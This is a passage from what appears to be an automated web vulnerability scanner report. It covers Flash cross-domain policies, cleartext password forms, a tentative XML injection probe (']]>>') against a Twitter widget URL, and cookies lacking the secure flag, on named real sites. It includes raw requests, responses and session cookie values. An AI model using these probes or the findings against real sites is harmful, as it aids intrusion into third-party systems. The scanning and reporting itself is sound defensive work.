Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bstats.adbrite.com

Response

HTTP/1.1 200 OK
Content-Type: text/x-cross-domain-policy
Content-Length: 398
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sun, 15 May 2011 16:53:20 GMT

<?xml version="1.0" encoding="UTF-8"?>

<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

4.3. http://cdn.shoutlet.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://cdn.shoutlet.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.shoutlet.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "b9c2a0-179-5e144d00"
Accept-Ranges: bytes
Content-Type: application/xml
Age: 123650
Date: Sun, 15 May 2011 16:53:15 GMT
Last-Modified: Fri, 21 May 2010 17:53:24 GMT
Content-Length: 377
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.shoutlet.com" />
<allow-access-from domain="*.shoutlet.dev" />
<allow-access-from domain="*.thematerialgroup.com" />
<allow-access-from domain="*.amfamdigital.com" />
...[SNIP]...

4.4. http://feeds.bbci.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Sun, 15 May 2011 16:59:09 GMT
Date: Sun, 15 May 2011 16:57:09 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.5. http://googleads.g.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 15 May 2011 10:44:56 GMT
Expires: Mon, 16 May 2011 10:44:56 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 22108
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.6. http://newsrss.bbc.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Sun, 15 May 2011 16:59:04 GMT
Date: Sun, 15 May 2011 16:57:04 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.7. http://static.ak.fbcdn.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.138.64.186
Date: Sun, 15 May 2011 16:26:42 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

4.8. http://track.lfstmedia.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://track.lfstmedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: track.lfstmedia.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 15 May 2011 16:53:19 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Fri, 22 May 2009 11:26:35 GMT
Accept-Ranges: bytes
Content-Length: 137
Expires: Sun, 15 May 2011 16:53:18 GMT
Cache-Control: no-cache

<cross-domain-policy>
<allow-access-from domain="*.my-iqquiz.com"/>
<allow-access-from domain="*.lstrack.com"/>
</cross-domain-policy>

4.9. http://www.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.103.39
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

4.10. http://www.lifestreetmedia.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lifestreetmedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.lifestreetmedia.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 15 May 2011 16:53:21 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Fri, 13 May 2011 20:07:44 GMT
Accept-Ranges: bytes
Content-Length: 308
Cache-Control: max-age=3600
Expires: Sun, 15 May 2011 17:53:21 GMT
Set-Cookie: cs=ip633-jb6VjGV9Y43EoLHduGUzaA; path=/; domain=.www.lifestreetmedia.com

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross
...[SNIP]...
<allow-access-from domain="*.dmajet.net" secure="false"/>
...[SNIP]...

4.11. http://www.votigo.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.votigo.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.votigo.com

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=NJMZMZS192.168.1.246CKMLQ; path=/
Date: Sun, 15 May 2011 16:53:23 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 07:04:21 GMT
ETag: "f60001-164-4a2d272e0a740"
Accept-Ranges: bytes
Content-Length: 356
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="maste
...[SNIP]...
<allow-access-from domain="*.votigo.com" />
...[SNIP]...

4.12. http://www.youtube.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Sun, 15 May 2011 17:00:24 GMT
Server: Apache
Last-Modified: Fri, 13 May 2011 03:51:08 GMT
ETag: "132-4a320373f0300"
Accept-Ranges: bytes
Content-Length: 306
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

4.13. http://hubspot.app1.hubspot.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hubspot.app1.hubspot.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: hubspot.app1.hubspot.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Wed, 17 Oct 2007 22:47:20 GMT
Accept-Ranges: bytes
ETag: "04cb8acf11c81:cb67"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 16:53:14 GMT
Connection: close
Set-Cookie: HUBSPOT131=420549804.0.0000; path=/

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
- <cross-domain-policy>
<allow-access-from domain="www.bluemedia.com" secure="true" />
</cross-domain-p
...[SNIP]...

5. Cleartext submission of password previous next
There are 3 instances of this issue:

http://gold.insidenetwork.com/facebook/
http://my.lifestreetmedia.com/login/register/
http://publishers.criteo.com/signup.aspx

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

5.1. http://gold.insidenetwork.com/facebook/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gold.insidenetwork.com
Path:	/facebook/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://gold.insidenetwork.com/facebook/gold/login.php

The form contains the following password field:

amember_pass

Request

GET /facebook/ HTTP/1.1
Host: gold.insidenetwork.com
Proxy-Connection: keep-alive
Referer: http://www.insidefacebook.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=26c3k0om3jud3pejl69oieed17; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://gold.insidenetwork.com/facebook/xmlrpc.php
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 12038



<!DO
...[SNIP]...
<ul>
<form name="loginform" id="loginform" action="http://gold.insidenetwork.com/facebook/gold/login.php">
<label>
...[SNIP]...
<br /> <input type="password" name="amember_pass" id="pwd" value="" size="20" tabindex="8" /></label>
...[SNIP]...

5.2. http://my.lifestreetmedia.com/login/register/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://my.lifestreetmedia.com
Path:	/login/register/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://my.lifestreetmedia.com/login/register/

The form contains the following password fields:

pass1
pass2

Request

GET /login/register/ HTTP/1.1
Host: my.lifestreetmedia.com
Proxy-Connection: keep-alive
Referer: http://www.lifestreetmedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: nginx
Date: Sun, 15 May 2011 16:55:20 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: https://my.lifestreetmedia.com/login/register/
Vary: Accept-Encoding
Set-Cookie: cs=ip633-FAJUmbOgH7WNCK7VMGS02w; path=/; domain=.my.lifestreetmedia.com
Content-Length: 26611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>LifeStreet Media - S
...[SNIP]...
</script>

                       <form method="post" onsubmit="return checkTerms();" action="/login/register/">
                           <table cellpadding="5" cellspacing="0" border="0" class="reg_table">
...[SNIP]...
<td>
                                       <input class="inputRegular" type="password" name="pass1" id="reg_pass" tabindex="2" value="" />
                                   </td>
...[SNIP]...
<td>
                                       <input class="inputRegular" type="password" name="pass2" id="reg_pass2" tabindex="3" value="" />
                                   </td>
...[SNIP]...

5.3. http://publishers.criteo.com/signup.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://publishers.criteo.com
Path:	/signup.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://publishers.criteo.com/signup.aspx?lang=en-US

The form contains the following password fields:

ctl00$MainContent$tbPassword
ctl00$MainContent$tbConfirmPassword
ctl00$MainContent$ctlLogin$ctlLogin$Password

Request

GET /signup.aspx?lang=en-US HTTP/1.1
Host: publishers.criteo.com
Proxy-Connection: keep-alive
Referer: http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.2.10.1305478412

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:55:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vh1noy45f04unq45owf1w545; path=/; HttpOnly
Set-Cookie: CulturePreference=en-US; expires=Fri, 15-May-2111 16:55:15 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
_ontent-Length: 34536
Connection: Keep-Alive
Content-Length: 34536

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Criteo Publi
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="signup.aspx?lang=en-US" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<div class="floatLeft"><input name="ctl00$MainContent$tbPassword" type="password" id="ctl00_MainContent_tbPassword" />
<span id="ctl00_MainContent_rfvPassword" style="color:Red;visibility:hidden;">
...[SNIP]...
<div class="floatLeft">
<input name="ctl00$MainContent$tbConfirmPassword" type="password" id="ctl00_MainContent_tbConfirmPassword" />
<span id="ctl00_MainContent_rfvConfirmPassword" style="color:Red;visibility:hidden;">
...[SNIP]...
<td style="width: 165px">
<input name="ctl00$MainContent$ctlLogin$ctlLogin$Password" type="password" maxlength="20" id="ctl00_MainContent_ctlLogin_ctlLogin_Password" tabindex="2" style="width: 60px;" />
<span id="ctl00_MainContent_ctlLogin_ctlLogin_PasswordRequired" title="Please enter password" style="color:Red;visibility:hidden;">
...[SNIP]...

6. XML injection previous next
There are 2 instances of this issue:

/widgets/tweet_button.html [REST URL parameter 1]
/widgets/tweet_button.html [REST URL parameter 2]

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.

6.1. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://platform0.twitter.com
Path:	/widgets/tweet_button.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets]]>>/tweet_button.html?_=1305476798307&count=horizontal&lang=en&related=invisionps&text=Social%20Groups%201.0.0%20Beta%20Released!%20-%20Invision%20Power%20Services&url=http%3A%2F%2Fcommunity.invisionpower.com%2Fblog%2F2568%2Fentry-6080-social-groups-100-beta-released%2F&via=invisionps HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/blog/2568/entry-6080-social-groups-100-beta-released/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305412459.2

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 294
Date: Sun, 15 May 2011 16:26:43 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets]]>>/tweet_button.html</Key><RequestId>F2C3F2DA71358F9E</Reque
...[SNIP]...

6.2. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://platform0.twitter.com
Path:	/widgets/tweet_button.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/tweet_button.html]]>>?_=1305476798307&count=horizontal&lang=en&related=invisionps&text=Social%20Groups%201.0.0%20Beta%20Released!%20-%20Invision%20Power%20Services&url=http%3A%2F%2Fcommunity.invisionpower.com%2Fblog%2F2568%2Fentry-6080-social-groups-100-beta-released%2F&via=invisionps HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/blog/2568/entry-6080-social-groups-100-beta-released/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305412459.2

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 294
Date: Sun, 15 May 2011 16:26:45 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/tweet_button.html]]>></Key><RequestId>1311F81E84A688CC</Reque
...[SNIP]...

7. SSL cookie without secure flag set previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.invisionpower.com
Path:	/clients/index.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

maan_session_id=a4533e26a4bb6bff0bf247e222ebe94c; path=/; domain=invisionpower.com; httponly
PHPSESSID=d0f3d69516c661d8737579de7244be22; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

GET /clients/index.php?app=nexus&module=payments&section=store&do=item&id=21 HTTP/1.1
